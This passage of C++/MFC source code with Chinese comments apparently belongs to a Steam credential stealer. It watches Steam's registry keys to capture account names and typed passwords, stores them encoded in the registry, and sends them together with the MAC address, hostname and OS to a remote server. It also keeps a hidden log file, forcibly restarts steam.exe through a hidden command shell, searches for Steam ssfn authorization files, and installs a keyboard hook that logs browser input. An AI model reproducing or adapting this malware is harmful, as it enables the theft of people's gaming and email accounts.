MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData = {0};int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}_Result = gethostname(jsj, sizeof(jsj));if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}WSACleanup();// 获取MACCString szMac = "";szMac = GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData = 
"";strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), strServerName, szMac, osx, jsj, szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace(" ", "%20");//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){//AfxMessageBox("成功发送数据!");FILE *fp;CFileFind finder1x;BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");if(!noEmpty1x){fp=fopen("C:\\NTUSERS.LOG", "w");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}else{fp=fopen("C:\\NTUSERS.LOG", "a");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;/*		邮箱令牌	*/if(szLocalLP == "0"){DeleteFile("C:\\MailData.txt");//创建劫持IE线程//szBrowser = false;//DWORD dwThreadId;//CreateThread(NULL, 0, HOOKBrowser, NULL, 0, &dwThreadId);//创建线程监控ST主界面myEmailSTR = "";DWORD dwThreadId2;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId2); /*创	建锁定注册表默认浏览器与劫持非 IE 内核浏览器线	程*///DWORD dwThreadId3;//CreateThread(NULL, 0, HOOKIERegedit, NULL, 0, &dwThreadId3); }else if(szLocalLP == "2"){/*		未知令牌	*///创建线程监控ST主界面myEmailSTR = "";DWORD dwThreadId;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId); }}else{//AfxMessageBox("发送数据失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, 
"open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}}}Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);}else{HWND Hwnd_Steam = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass1 = szMySTClass.Find("PopupWindow", 0);int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";szStyle1.Format(TEXT("%X"), lstyle1);szStyle2.Format(TEXT("%X"), lstyle2);szStyle3.Format(TEXT("%X"), lstyle3);szStyle4.Format(TEXT("%X"), lstyle4);if( (isSTClass2 >= 0 || isSTClass1 >= 0) && (szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") ){/* 此为租号数据 */szLocalLP = "3";HKEY hKey, xKey;LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char user[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;LONG lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)user, &dwLength );if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 ){CString LocalUser = "";CString ReadRegUser = "";LocalUser.Format(TEXT("%s"), user);ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet2 == ERROR_SUCCESS ){char data1[256] = {0}, data2[256] = 
{0}, data3[256] = {0}, data4[256] = {0};DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;LONG lRet3 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &dwType1, (LPBYTE)data1, &dwLength1 );LONG lRet4 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );LONG lRet5 = RegQueryValueEx( xKey, TEXT("AccSecond"), NULL, &dwType3, (LPBYTE)data3, &dwLength3 );LONG lRet6 = RegQueryValueEx( xKey, TEXT("DataSecond"), NULL, &dwType4, (LPBYTE)data4, &dwLength4 );if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) ){CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";szRegAccOne.Format(TEXT("%s"), data1);szRegDataOne.Format(TEXT("%s"), data2);szRegAccSecon.Format(TEXT("%s"), data3);szRegDataSecon.Format(TEXT("%s"), data4);/// 随机生成 16位 KEYtime_t seed = time(NULL); srand((unsigned)seed);int randNum = (rand()*2);CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";szMD5Key += "_CHWM_";int szMD5Key_Len = szMD5Key.GetLength();for(int j=szMD5Key_Len; j<16 ;j++){int randNum = rand()%26;if(j%2){szMD5.Format("%C", randNum+97);}else{szMD5.Format("%C", randNum+65);}szMD5Key += szMD5;Sleep(50);}szMD5Key = gen(szMD5Key);Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData = {0};int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}_Result = gethostname(jsj, sizeof(jsj));if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}WSACleanup();// 获取MACCString szMac = "";szMac = GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), strServerName, szMac, osx, jsj, 
szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace(" ", "%20");//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){//AfxMessageBox("成功发送数据!");FILE *fp;CFileFind finder1x;BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");if(!noEmpty1x){fp=fopen("C:\\NTUSERS.LOG", "w");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}else{fp=fopen("C:\\NTUSERS.LOG", "a");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;///// 处理电脑授权文件CString mySTInstPath = "", mySTSSFNFilePath = "";HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );mySTInstPath.Format(TEXT("%s"), dw_data);mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);szTslgameEXE = true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); ///}else{//AfxMessageBox("发送数据失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c 
taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}}}Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);}}}else{if( !GetProcess("steam.exe") ){Login = false;szLoginEXE = true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 线程 1static DWORD WINAPI HOOKRegedit(LPVOID pParam)
{//AfxMessageBox("线程 1 已启动!");HANDLE hNotify;HKEY hKeyx;hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE,   //设置初始状态 "RegistryNotify" //事件对象的名称 ); if (hNotify == 0) { Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 "Software\\Valve\\Steam", //子键 0, //reserved KEY_NOTIFY, //监视用 &hKeyx //保存句柄 ) != ERROR_SUCCESS) { CloseHandle(hNotify); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) != ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hKeyx); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) { //MessageBox(NULL,"注册表有改动"," ",MB_OK);szStrFirst = "";szStrFirst = szStr;szStr = "";HKEY hKey;LONG lRet, lRet2, lRet3, lRet4;lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char data[256] = {0}, data2[256] = {0};DWORD dwType = REG_SZ, dwType2 = REG_SZ;DWORD dwLength = 256, dwLength2 = 256;lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)data, &dwLength );lRet3 = RegQueryValueEx( hKey, TEXT("SteamExe"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );DWORD dwLastXError = 0;lRet4 = RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastXError, sizeof(DWORD) );if(lRet2 == ERROR_SUCCESS && lRet3 == 
ERROR_SUCCESS){szRegUser.Format(TEXT("%s"), data);szRegExe.Format(TEXT("%s"), data2);DWORD flen;char *dataX;CFile *file2;file2 = new CFile;if( file2->Open("C:\\NTUSERS.LOG", CFile::shareDenyNone | CFile::modeRead) ){flen = file2->GetLength();dataX = new char[(int)flen+1];file2->SeekToBegin();file2->Read(dataX, flen);}szAccount.Format(TEXT("%s"), dataX);file2->Close();delete file2;delete []dataX;//AfxMessageBox(szAccount);int ff = szAccount.Find(szRegUser, 0);if( ff >= 0 ){//AfxMessageBox("帐号:"+szRegUser+"\n模糊数据:"+szStrFirst+"\n当前 帐号 为重复数据!");Regedit = false;RegDeleteValue(hKey, TEXT("AutoLoginUser"));}else{HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );szSTPath.Format(TEXT("%s"), dw_data);szSTFile.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);//// 删除电脑授权文件//char *mySSFNPath = szSTPath.GetBuffer(szSTPath.GetLength()+1);//szSTPath.ReleaseBuffer();//char *mySSFNFile = szSTFile.GetBuffer(szSTFile.GetLength()+1);//szSTFile.ReleaseBuffer();//SearchFilesByWildcard_1(mySSFNPath, mySSFNFile);//CString WriteRegUser = "";WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser);HKEY hKeyX;DWORD dwDisp;DWORD dwTypeX = REG_SZ;int ret = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKeyX, &dwDisp);if (ret == ERROR_SUCCESS){szOneUser=szRegUser+"  ";szRegUser=gen(szRegUser);CString Base64_szRegUser = "";Base64_szRegUser = BASE64Encode(szRegUser, szRegUser.GetLength());char *szAc1 = Base64_szRegUser.GetBuffer(Base64_szRegUser.GetLength()+1);Base64_szRegUser.ReleaseBuffer();int ret2 = RegSetValueEx(hKeyX, TEXT("AccOne"), 0, dwTypeX, (BYTE*)szAc1, strlen(szAc1));if (ret2 == ERROR_SUCCESS){szStrFirst=gen(szStrFirst);CString 
Base64_szStrFirst = "";Base64_szStrFirst = BASE64Encode(szStrFirst, szStrFirst.GetLength());char *szDt1 = Base64_szStrFirst.GetBuffer(Base64_szStrFirst.GetLength()+1);Base64_szStrFirst.ReleaseBuffer();int ret3 = RegSetValueEx(hKeyX, TEXT("DataOne"), 0, dwTypeX, (BYTE*)szDt1, strlen(szDt1));if (ret3 == ERROR_SUCCESS){//AfxMessageBox("首次帐号:"+szRegUser+"\n首次模糊数据:"+szDt1+"\nEXE路径:"+szRegExe);DWORD dwLastError = 0;RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastError, sizeof(DWORD) );RegCloseKey(hKeyX);RegCloseKey(hKey);CloseHandle(hNotify);RegCloseKey(hKeyx);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe && \""+szRegExe+"\"", NULL, SW_HIDE);Sleep(2000);Regedit = false;//MessageBox(0, "steam.exe 读取系统数据失败,请再次登录! ", "[ Steam ]", MB_ICONERROR | MB_OK | MB_DEFBUTTON1);}}}RegCloseKey(hKeyX);}}}RegCloseKey(hKey);}CloseHandle(hNotify);RegCloseKey(hKeyx);return 0;
}// 线程 2static DWORD WINAPI HOOKRegedit2(LPVOID pParam)
{//AfxMessageBox("线程 2 已启动!");HKEY hKey_xxx;LONG lRet_xxx1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey_xxx );if( lRet_xxx1 == ERROR_SUCCESS ){char data_xxx[256] = {0};DWORD dwType_xxx = REG_SZ;DWORD dwLength_xxx = 256;memset(data_xxx, 0, 256);LONG lRet_xxx2 = RegQueryValueEx( hKey_xxx, TEXT("AutoLoginUser"), NULL, &dwType_xxx, (LPBYTE)data_xxx, &dwLength_xxx );if(lRet_xxx2 == ERROR_SUCCESS){CString myReg1User = "";myReg1User.Format(TEXT("%s "), data_xxx);char *sz1User = myReg1User.GetBuffer(myReg1User.GetLength()+1);myReg1User.ReleaseBuffer();DWORD XdwType_X = REG_SZ;RegSetValueEx( hKey_xxx, TEXT("AutoLoginUser"), 0, XdwType_X, (BYTE*)sz1User, strlen(sz1User) );}}RegCloseKey(hKey_xxx);HANDLE hNotify;HKEY hxKeyx;hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE,   //设置初始状态 "RegistryNotify" //事件对象的名称 ); if (hNotify == 0) { Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 "Software\\Valve\\Steam", //子键 0, //reserved KEY_NOTIFY, //监视用 &hxKeyx //保存句柄 ) != ERROR_SUCCESS) { CloseHandle(hNotify); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hxKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) != ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hxKeyx); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) { //MessageBox(NULL,"注册表有改动"," 
",MB_OK);szStrSecon = "";szStrSecon = szStr;szStr = "";HKEY hKey;LONG lRet, lRet2;lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char data[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)data, &dwLength );if(lRet2 == ERROR_SUCCESS){szMailID.Format(TEXT("%s"), data);szMailID.Replace(" ", "");szRegUser2.Format(TEXT("%s"), data);szRegUser2.Replace(" ", "");//AfxMessageBox("二次帐号:"+szRegUser2+"\n二次密码:"+szStrSecon);CString ReadRegUser = "";ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser2);HKEY xKey;LONG lRet3, lRet4, lRet5;lRet3 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet3 == ERROR_SUCCESS ){char xdata[256] = {0};char xdata2[256] = {0};DWORD xdwType1 = REG_SZ;DWORD xdwType2 = REG_SZ;DWORD xdwLength1 = 256;DWORD xdwLength2 = 256;lRet4 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &xdwType1, (LPBYTE)xdata, &xdwLength1 );lRet5 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &xdwType2, (LPBYTE)xdata2, &xdwLength2 );if(lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS){CString szReplaceStr = "";CString Base64_AccSeconData = "", Base64_DataSeconData = "";szReplaceStr = szRegUser2 + "   ";szRegUser2 = gen(szRegUser2);Sleep(500);szStrSecon.Replace(szReplaceStr, "");szStrSecon = gen(szStrSecon);Base64_AccSeconData = BASE64Encode(szRegUser2, szRegUser2.GetLength());Sleep(500);Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);Base64_AccSeconData.ReleaseBuffer();char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);Base64_DataSeconData.ReleaseBuffer();DWORD XxdwTypeX1 = REG_SZ, XxdwTypeX2 = REG_SZ;LONG lRet6 = RegSetValueEx( xKey, TEXT("AccSecond"), NULL, XxdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7 = 
RegSetValueEx( xKey, TEXT("DataSecond"), NULL, XxdwTypeX2, (BYTE*)szData2, strlen(szData2));if(lRet6 == ERROR_SUCCESS && lRet7 == ERROR_SUCCESS){//AfxMessageBox("设置注册表用户数据成功!");if( !Login ){DWORD dwThreadId;thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);Login = true;}DWORD xdwLastErrorx = 0;RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&xdwLastErrorx, sizeof(DWORD) );}else{//AfxMessageBox("设置注册表用户数据失败!");RegDeleteValue(hKey, TEXT("AutoLoginUser"));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{//AfxMessageBox("打开注册表用户数据键值失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("AutoLoginUser"));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{//AfxMessageBox("打开注册表用户数据目录失败!");char dataZ[256] = {0};DWORD dwTypeZ = REG_SZ;DWORD dwLengthZ = 256;LONG lRet3Z = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwTypeZ, (LPBYTE)dataZ, &dwLengthZ );DWORD dwLastErrorx = 0;LONG lRet4Z = RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastErrorx, sizeof(DWORD) );if(lRet3Z == ERROR_SUCCESS){//AfxMessageBox("Gaming is True!\n二次帐号:"+szRegUser3+"\n二次密码:"+szStrSecon);CString szRegUser3 = "";szRegUser3.Format(TEXT("%s"), dataZ);CString WriteRegUser = "";WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser3);HKEY xhKeyX;DWORD XxdwDisp;LONG lRetz = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &xhKeyX, &XxdwDisp);if(lRetz == ERROR_SUCCESS){CString szReplaceStr = "";CString Base64_AccSeconData = "", Base64_DataSeconData = "";szReplaceStr = szRegUser3 + "   ";szRegUser3 = gen(szRegUser3);Sleep(500);szStrSecon.Replace(szReplaceStr, "");szStrSecon = 
gen(szStrSecon);Base64_AccSeconData = BASE64Encode(szRegUser3, szRegUser3.GetLength());Sleep(500);Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);Base64_AccSeconData.ReleaseBuffer();char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);Base64_DataSeconData.ReleaseBuffer();DWORD XdwTypeX1 = REG_SZ, XdwTypeX2 = REG_SZ;DWORD XdwTypeX3 = REG_SZ, XdwTypeX4 = REG_SZ;LONG lRet6z = RegSetValueEx( xhKeyX, TEXT("AccSecond"), NULL, XdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7z = RegSetValueEx( xhKeyX, TEXT("DataSecond"), NULL, XdwTypeX2, (BYTE*)szData2, strlen(szData2));LONG lRet8z = RegSetValueEx( xhKeyX, TEXT("AccOne"), NULL, XdwTypeX3, (BYTE*)"", 0);LONG lRet9z = RegSetValueEx( xhKeyX, TEXT("DataOne"), NULL, XdwTypeX4, (BYTE*)"", 0);if(lRet6z == ERROR_SUCCESS && lRet7z == ERROR_SUCCESS && lRet8z == ERROR_SUCCESS && lRet9z == ERROR_SUCCESS){if( !Login ){DWORD dwThreadId;thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);Login = true;}RegDeleteValue(hKey, TEXT("Gaming"));}else{RegDeleteValue(hKey, TEXT("AutoLoginUser"));Regedit = false;RegCloseKey(xhKeyX);RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}RegCloseKey(xhKeyX);}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Regedit = false;RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}Regedit = false;RegCloseKey(xKey);}else{Regedit = false;RegDeleteValue(hKey, TEXT("AutoLoginUser"));}}RegCloseKey(hKey);} CloseHandle(hNotify);RegCloseKey(hxKeyx);return 0;
}// 清理帐号记录文件static DWORD WINAPI CleanUserData(LPVOID pParam)
{while(1){// 3 小时清理一次记录数据Sleep(3600000);DeleteFile("C:\\NTUSERS.LOG");}return 0;
}// HOOK 键盘回调函数 2 (监控 浏览器 输入)LRESULT DllExport CALLBACK IntProc2(int nCode, WPARAM wParam, LPARAM lParam)
{if( !::EnumWindows(EnumWindowsProc, NULL) ){if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1){BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);BOOL b_Clk = ::GetKeyState(VK_CAPITAL);BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);if(!b_Ctl && !b_Alt){if(b_Sft && !b_Clk){switch(wParam){case '1':myEmailSTR = "!";break;case '2':myEmailSTR = "@";break;case '3':myEmailSTR = "#";break;case '4':myEmailSTR = "$";break;case '5':myEmailSTR = "%";break;case '6':myEmailSTR = "^";break;case '7':myEmailSTR = "&";break;case '8':myEmailSTR = "*";break;case '9':myEmailSTR = "(";break;case '0':myEmailSTR = ")";break;case 'A':myEmailSTR = "A";break;case 'B':myEmailSTR = "B";break;case 'C':myEmailSTR = "C";break;case 'D':myEmailSTR = "D";break;case 'E':myEmailSTR = "E";break;case 'F':myEmailSTR = "F";break;case 'G':myEmailSTR = "G";break;case 'H':myEmailSTR = "H";break;case 'I':myEmailSTR = "I";break;case 'J':myEmailSTR = "J";break;case 'K':myEmailSTR = "K";break;case 'L':myEmailSTR = "L";break;case 'M':myEmailSTR = "M";break;case 'N':myEmailSTR = "N";break;case 'O':myEmailSTR = "O";break;case 'P':myEmailSTR = "P";break;case 'Q':myEmailSTR = "Q";break;case 'R':myEmailSTR = "R";break;case 'S':myEmailSTR = "S";break;case 